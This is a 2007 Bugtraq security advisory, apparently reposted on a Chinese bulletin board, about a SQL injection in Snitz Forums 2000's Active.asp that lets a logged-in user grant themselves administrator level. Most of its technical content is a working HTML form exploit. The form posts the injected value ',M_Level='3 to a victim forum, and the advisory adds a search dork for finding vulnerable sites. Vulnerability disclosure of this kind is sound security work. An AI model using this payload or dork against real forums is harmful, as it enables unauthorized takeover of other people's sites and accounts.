Snitz2000 SQL Injection: A user can gain admin level

看板Bugtraq作者時間18年前 (2007/12/05 00:03), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
########################## WwW.BugReport.ir ######################### # # AmnPardaz Security Research & Penetration Testing Group # # Title: A user can gain admin level in snitz 2000 by SQL Injection # vendor: http://forum.snitz.com/ # Googling: "Powered by Snitz" > 2,440,000 victims # Last bug report in 2007-02-16 with 4692 visitors # Exploit: Available # Fix Available: Update to last version. ######################## Bug Description ########################### A user can gain admin level in the forum and can access to the forum. It is because of a SQL Injection in "Active.asp" After login to your VICTIM forum, execute below script ~~~~~~~~~~~~Start HTML Exploit~~~~~~~~~ <form action="http://[VICTIM URL]/active.asp" method="post"> Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br /> DefaultValues: <input type="text" name="AllRead" value="Y" /><br /> Submit: <input type="submit" name="submit" value="Submit" /><br /> </form> ~~~~~~~~~~~~End HTML Exploit~~~~~~~~~ ##################################################################### # Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com # Country: Iran # Contact: admin@bugreport.ir # Credit: Soroush Dalili found this bug. #####################################################################
文章代碼(AID): #17LNf000 (Bugtraq)